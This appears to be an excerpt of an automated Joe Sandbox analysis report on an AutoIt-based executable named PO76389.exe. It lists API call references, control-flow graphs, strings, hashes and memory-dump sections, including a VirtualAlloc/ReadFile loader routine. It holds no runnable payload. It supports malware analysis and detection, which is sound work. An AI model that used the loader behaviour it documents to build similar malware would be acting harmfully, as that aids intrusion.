                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6D2C
                                                    • __set_osfhnd.LIBCMT ref: 004E6D5C
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6DC6
                                                    • __close_nolock.LIBCMT ref: 004E6DEC
                                                    • __chsize_nolock.LIBCMT ref: 004E6E1C
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6E2E
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6F26
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6F3B
                                                    • __close_nolock.LIBCMT ref: 004E6F9B
                                                      • Part of subcall function 004DF84C: CloseHandle.KERNEL32(00000000,0055EEC4,00000000,?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF89C
                                                      • Part of subcall function 004DF84C: GetLastError.KERNEL32(?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF8A6
                                                      • Part of subcall function 004DF84C: __free_osfhnd.LIBCMT ref: 004DF8B3
                                                      • Part of subcall function 004DF84C: __dosmaperr.LIBCMT ref: 004DF8D5
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __lseeki64_nolock.LIBCMT ref: 004E6FBD
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E70F2
                                                    • ___createFile.LIBCMT ref: 004E7111
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004E711E
                                                    • __dosmaperr.LIBCMT ref: 004E7125
                                                    • __free_osfhnd.LIBCMT ref: 004E7145
                                                    • __invoke_watson.LIBCMT ref: 004E7173
                                                    • __wsopen_helper.LIBCMT ref: 004E718D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                    • String ID: 9AM$@
                                                    • API String ID: 3896587723-3066932247
                                                    • Opcode ID: cbd20d05c05ea28087eada4c2529a36884401a7497344e17b962426cb1bfce66
                                                    • Instruction ID: fb0d25ed0290265abbe0b3dcbdf6d7870792e50cfe61dd5b9051275790d96148
                                                    • Opcode Fuzzy Hash: cbd20d05c05ea28087eada4c2529a36884401a7497344e17b962426cb1bfce66
                                                    • Instruction Fuzzy Hash: 06225231D002859FEB249E6ADC91BBF7B60EB203A5F25422BE521AB3D1C73D8D40D759

                                                    Control-flow Graph

                                                    APIs
                                                    • _wcscpy.LIBCMT ref: 0050026A
                                                    • _wcschr.LIBCMT ref: 00500278
                                                    • _wcscpy.LIBCMT ref: 0050028F
                                                    • _wcscat.LIBCMT ref: 0050029E
                                                    • _wcscat.LIBCMT ref: 005002BC
                                                    • _wcscpy.LIBCMT ref: 005002DD
                                                    • __wsplitpath.LIBCMT ref: 005003BA
                                                    • _wcscpy.LIBCMT ref: 005003DF
                                                    • _wcscpy.LIBCMT ref: 005003F1
                                                    • _wcscpy.LIBCMT ref: 00500406
                                                    • _wcscat.LIBCMT ref: 0050041B
                                                    • _wcscat.LIBCMT ref: 0050042D
                                                    • _wcscat.LIBCMT ref: 00500442
                                                      • Part of subcall function 004FC890: _wcscmp.LIBCMT ref: 004FC92A
                                                      • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC96F
                                                      • Part of subcall function 004FC890: _wcscpy.LIBCMT ref: 004FC982
                                                      • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC995
                                                      • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC9BA
                                                      • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9D0
                                                      • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 2955681530-2806939583
                                                    • Opcode ID: 489c2bd658fe145c864072f312bbcfc1fc5123079a58db1a1198986aa1b4a7dd
                                                    • Instruction ID: 03b2f6ee0750feaedaaa980fac81a034c6b10fd2a161fe55d5a3c531c839662b
                                                    • Opcode Fuzzy Hash: 489c2bd658fe145c864072f312bbcfc1fc5123079a58db1a1198986aa1b4a7dd
                                                    • Instruction Fuzzy Hash: 88919271504705AFCB20EF51C955F9EB7E8BF84318F00485EF945972A2EB38EA48CB5A

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004CEA39
                                                    • __wsplitpath.LIBCMT ref: 004CEA56
                                                      • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                    • _wcsncat.LIBCMT ref: 004CEA69
                                                    • __makepath.LIBCMT ref: 004CEA85
                                                      • Part of subcall function 004D2BFF: __wmakepath_s.LIBCMT ref: 004D2C13
                                                      • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                      • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                    • _wcscpy.LIBCMT ref: 004CEABE
                                                      • Part of subcall function 004CEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                    • _wcscat.LIBCMT ref: 005232FC
                                                    • _wcscat.LIBCMT ref: 00523334
                                                    • _wcsncpy.LIBCMT ref: 00523370
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                    • String ID: '/O$Include$\$"W
                                                    • API String ID: 1213536620-347652088
                                                    • Opcode ID: 3ecd232318733e4027ff582f0f7bc8d6e09b9edd9f15f958d9332b70517bc4df
                                                    • Instruction ID: 5bab6466ce6671c34c39b5b83ffde48aff3be5f7a130da88f229b09927cb8669
                                                    • Opcode Fuzzy Hash: 3ecd232318733e4027ff582f0f7bc8d6e09b9edd9f15f958d9332b70517bc4df
                                                    • Instruction Fuzzy Hash: 42519EB54043409BC314EF5AFC95C9AB7E8FB69304F40091FF54987261EB789688EF6A

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO76389.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                      • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                    • _wcscpy.LIBCMT ref: 004B43C0
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO76389.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0052214E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\PO76389.exe$CMDLINE$CMDLINERAW
                                                    • API String ID: 861526374-950967602
                                                    • Opcode ID: e723d0f4a94f6b41af66d3479709beb5ce9b624f7f630ccada7a4d877ccddf49
                                                    • Instruction ID: 47bb017c9f432d4337db13d9659dad45d83ed8d4409e47c35f9c402ef419a79b
                                                    • Opcode Fuzzy Hash: e723d0f4a94f6b41af66d3479709beb5ce9b624f7f630ccada7a4d877ccddf49
                                                    • Instruction Fuzzy Hash: 4081C272900119AACB04EBE5DC52EEF7BB8EF55318F50001FE541B7092EF686A08DB79

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 991 4fc890-4fc940 call 4e0650 call 4d010a call 4b4bce call 4fc6a0 call 4b41a7 call 4d2203 1004 4fc946-4fc94d call 4fce59 991->1004 1005 4fc9f3-4fc9fa call 4fce59 991->1005 1010 4fc9fc-4fc9fe 1004->1010 1011 4fc953-4fc9f1 call 4d297d call 4d1943 call 4d1914 call 4d297d call 4d1914 * 2 1004->1011 1005->1010 1012 4fca03 1005->1012 1013 4fcc53-4fcc54 1010->1013 1015 4fca06-4fcac2 call 4b417d * 8 call 4fd009 call 4d4129 1011->1015 1012->1015 1016 4fcc71-4fcc7f call 4b4fd2 1013->1016 1050 4fcacb-4fcae6 call 4fc6e4 1015->1050 1051 4fcac4-4fcac6 1015->1051 1054 4fcaec-4fcaf4 1050->1054 1055 4fcb78-4fcb84 call 4d4274 1050->1055 1051->1013 1056 4fcafc 1054->1056 1057 4fcaf6-4fcafa 1054->1057 1062 4fcb9a-4fcb9e 1055->1062 1063 4fcb86-4fcb95 DeleteFileW 1055->1063 1059 4fcb01-4fcb1f call 4b417d 1056->1059 1057->1059 1067 4fcb49-4fcb5f call 4fc07d call 4d373e 1059->1067 1068 4fcb21-4fcb27 1059->1068 1065 4fcc2e-4fcc42 CopyFileW 1062->1065 1066 4fcba4-4fcc1b call 4fd10c call 4fd134 call 4fc251 1062->1066 1063->1013 1070 4fcc56-4fcc6c DeleteFileW call 4fcfc8 1065->1070 1071 4fcc44-4fcc51 DeleteFileW 1065->1071 1066->1070 1087 4fcc1d-4fcc2c DeleteFileW 1066->1087 1084 4fcb64-4fcb6f 1067->1084 1073 4fcb29-4fcb3c call 4fc81a 1068->1073 1070->1016 1071->1013 1082 4fcb3e-4fcb47 1073->1082 1082->1067 1084->1054 1085 4fcb75 1084->1085 1085->1055 1087->1013
                                                    APIs
                                                      • Part of subcall function 004FC6A0: __time64.LIBCMT ref: 004FC6AA
                                                      • Part of subcall function 004B41A7: _fseek.LIBCMT ref: 004B41BF
                                                    • __wsplitpath.LIBCMT ref: 004FC96F
                                                      • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                    • _wcscpy.LIBCMT ref: 004FC982
                                                    • _wcscat.LIBCMT ref: 004FC995
                                                    • __wsplitpath.LIBCMT ref: 004FC9BA
                                                    • _wcscat.LIBCMT ref: 004FC9D0
                                                    • _wcscat.LIBCMT ref: 004FC9E3
                                                      • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC71D
                                                      • Part of subcall function 004FC6E4: _memmove.LIBCMT ref: 004FC72C
                                                    • _wcscmp.LIBCMT ref: 004FC92A
                                                      • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF49
                                                      • Part of subcall function 004FCE59: _wcscmp.LIBCMT ref: 004FCF5C
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004FCB8D
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC24
                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004FCC3A
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC4B
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004FCC5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                    • String ID:
                                                    • API String ID: 152968663-0
                                                    • Opcode ID: 4a5209259add9fcd4b50de93f1960a280f96b4825bc323e04f20801b2ffb6f02
                                                    • Instruction ID: aba585fc70bae1c10a142ea9f2bc4dd08ece9326de4a3c74e63334a1cb58d018
                                                    • Opcode Fuzzy Hash: 4a5209259add9fcd4b50de93f1960a280f96b4825bc323e04f20801b2ffb6f02
                                                    • Instruction Fuzzy Hash: A4C12BB1D0011DAACF10DFA5CD81AEEB7BDAF99314F0040ABF609E6251D7749A84CF69

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004B30B0
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004B30BF
                                                    • LoadIconW.USER32(00000063), ref: 004B30D5
                                                    • LoadIconW.USER32(000000A4), ref: 004B30E7
                                                    • LoadIconW.USER32(000000A2), ref: 004B30F9
                                                      • Part of subcall function 004B318A: LoadImageW.USER32(004B0000,00000063,00000001,00000010,00000010,00000000), ref: 004B31AE
                                                    • RegisterClassExW.USER32(?), ref: 004B3167
                                                      • Part of subcall function 004B2F58: GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                      • Part of subcall function 004B2F58: RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                      • Part of subcall function 004B2F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004B2FC6
                                                      • Part of subcall function 004B2F58: LoadIconW.USER32(000000A9), ref: 004B3009
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 2880975755-4155596026
                                                    • Opcode ID: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                    • Instruction ID: ceff5d561b1f5500a7b4d7e3c97798467ef73b2f795052532df841ffe39be754
                                                    • Opcode Fuzzy Hash: efdcddb9cafff84397602e569c8e24441f4623b77279618fdf453eb8700ad1df
                                                    • Instruction Fuzzy Hash: 6C214470D10704ABCB109FADFD09A99BFF5FB54310F10412AE208A62A0D3744588FF69

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                    • RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 004B2FC6
                                                    • LoadIconW.USER32(000000A9), ref: 004B3009
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 975902462-1005189915
                                                    • Opcode ID: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                    • Instruction ID: 5732ac73bcce4ec07050f3c90708185e54734cc243cb693dfc17334f7716fe69
                                                    • Opcode Fuzzy Hash: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                    • Instruction Fuzzy Hash: 0121C3B5900718AFDB109FA8F989BCDBBF4FB18704F00411AF615A62A0D7B44588EFA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1156 4b3dcb-4b3df1 call 4b3f9b 1159 5239f9-523a09 call 4fcc82 1156->1159 1160 4b3df7-4b3e04 call 4b3f9b 1156->1160 1164 523a0e-523a10 1159->1164 1160->1159 1165 4b3e0a-4b3e10 1160->1165 1166 523a12-523a15 call 4b3e39 1164->1166 1167 523a2f-523a77 call 4d010a 1164->1167 1169 523a1a-523a29 call 4f757b 1165->1169 1170 4b3e16-4b3e36 call 4bbdf0 1165->1170 1166->1169 1176 523a98 1167->1176 1177 523a79-523a96 call 4cac65 1167->1177 1169->1167 1180 523a9a-523aad 1176->1180 1177->1180 1182 523ab3 1180->1182 1183 523c24-523c27 call 4d28ca 1180->1183 1185 523aba-523abd call 4f3460 1182->1185 1186 523c2c-523c35 call 4b3e39 1183->1186 1189 523ac2-523ae4 call 4bb7ff call 4fa5be 1185->1189 1192 523c37-523c47 call 4b5800 call 4fa46f 1186->1192 1198 523ae6-523af3 1189->1198 1199 523af8-523b02 call 4fa5a8 1189->1199 1206 523c4c-523c7c call 4f32b0 call 4d017e call 4d28ca call 4b3e39 1192->1206 1201 523beb-523bfb call 4bb6d0 1198->1201 1208 523b04-523b17 1199->1208 1209 523b1c-523b26 call 4fa592 1199->1209 1201->1189 1211 523c01-523c0b call 4ba870 1201->1211 1206->1192 1208->1201 1218 523b3a-523b44 call 4cdf5b 1209->1218 1219 523b28-523b35 1209->1219 1217 523c10-523c1e 1211->1217 1217->1183 1217->1185 1218->1201 1225 523b4a-523b62 call 4f30ac 1218->1225 1219->1201 1230 523b64-523b83 call 4bcaee call 4b5cd3 1225->1230 1231 523b85-523b88 1225->1231 1254 523ba6-523bb4 call 4bb7ff 1230->1254 1233 523bb6-523bb9 1231->1233 1234 523b8a-523ba5 call 4bcaee call 4f34b4 call 4b5cd3 1231->1234 1236 523bbb-523bc4 call 4f2fcd 1233->1236 1237 523bd9-523bdc call 4fa525 1233->1237 1234->1254 1236->1206 1247 523bca-523bd4 call 4d017e 1236->1247 1244 523be1-523bea call 4d017e 1237->1244 1244->1201 1247->1189 1254->1244
                                                    APIs
                                                      • Part of subcall function 004B3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                    • _free.LIBCMT ref: 00523C27
                                                    • _free.LIBCMT ref: 00523C6E
                                                      • Part of subcall function 004BBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,005722E8,?,00000000,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?), ref: 004BBE8B
                                                      • Part of subcall function 004BBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,004B3E2E,?,00000000,?,0054DBF0,00000000,?,00000002), ref: 004BBEA7
                                                      • Part of subcall function 004BBDF0: __wsplitpath.LIBCMT ref: 004BBF19
                                                      • Part of subcall function 004BBDF0: _wcscpy.LIBCMT ref: 004BBF31
                                                      • Part of subcall function 004BBDF0: _wcscat.LIBCMT ref: 004BBF46
                                                      • Part of subcall function 004BBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 004BBF56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<K$G-K
                                                    • API String ID: 1510338132-2902009562
                                                    • Opcode ID: 6dbb5d636c18b06a45701bf74a1571ad732cc16841ba02cab5a83b6d3395ee84
                                                    • Instruction ID: d2686bafdee55e7188707ecc92c7b46ba45e59163185f7c322b019cabefcc3d7
                                                    • Opcode Fuzzy Hash: 6dbb5d636c18b06a45701bf74a1571ad732cc16841ba02cab5a83b6d3395ee84
                                                    • Instruction Fuzzy Hash: A3917F71910229AFCF04EFA5DC919EEBBB4FF09314F14442EF416AB291DB789A05CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1259 da19d8-da1a86 call d9f398 1262 da1a8d-da1ab3 call da28e8 CreateFileW 1259->1262 1265 da1aba-da1aca 1262->1265 1266 da1ab5 1262->1266 1274 da1acc 1265->1274 1275 da1ad1-da1aeb VirtualAlloc 1265->1275 1267 da1c05-da1c09 1266->1267 1268 da1c4b-da1c4e 1267->1268 1269 da1c0b-da1c0f 1267->1269 1271 da1c51-da1c58 1268->1271 1272 da1c1b-da1c1f 1269->1272 1273 da1c11-da1c14 1269->1273 1276 da1c5a-da1c65 1271->1276 1277 da1cad-da1cc2 1271->1277 1278 da1c2f-da1c33 1272->1278 1279 da1c21-da1c2b 1272->1279 1273->1272 1274->1267 1280 da1aed 1275->1280 1281 da1af2-da1b09 ReadFile 1275->1281 1284 da1c69-da1c75 1276->1284 1285 da1c67 1276->1285 1286 da1cd2-da1cda 1277->1286 1287 da1cc4-da1ccf VirtualFree 1277->1287 1288 da1c43 1278->1288 1289 da1c35-da1c3f 1278->1289 1279->1278 1280->1267 1282 da1b0b 1281->1282 1283 da1b10-da1b50 VirtualAlloc 1281->1283 1282->1267 1290 da1b52 1283->1290 1291 da1b57-da1b72 call da2b38 1283->1291 1292 da1c89-da1c95 1284->1292 1293 da1c77-da1c87 1284->1293 1285->1277 1287->1286 1288->1268 1289->1288 1290->1267 1299 da1b7d-da1b87 1291->1299 1296 da1ca2-da1ca8 1292->1296 1297 da1c97-da1ca0 1292->1297 1295 da1cab 1293->1295 1295->1271 1296->1295 1297->1295 1300 da1bba-da1bce call da2948 1299->1300 1301 da1b89-da1bb8 call da2b38 1299->1301 1307 da1bd2-da1bd6 1300->1307 1308 da1bd0 1300->1308 1301->1299 1309 da1bd8-da1bdc CloseHandle 1307->1309 1310 da1be2-da1be6 1307->1310 1308->1267 1309->1310 1311 da1be8-da1bf3 VirtualFree 1310->1311 1312 da1bf6-da1bff 1310->1312 1311->1312 1312->1262 1312->1267
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00DA1AA9
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DA1CCF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096915839.0000000000D9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D9F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d9f000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
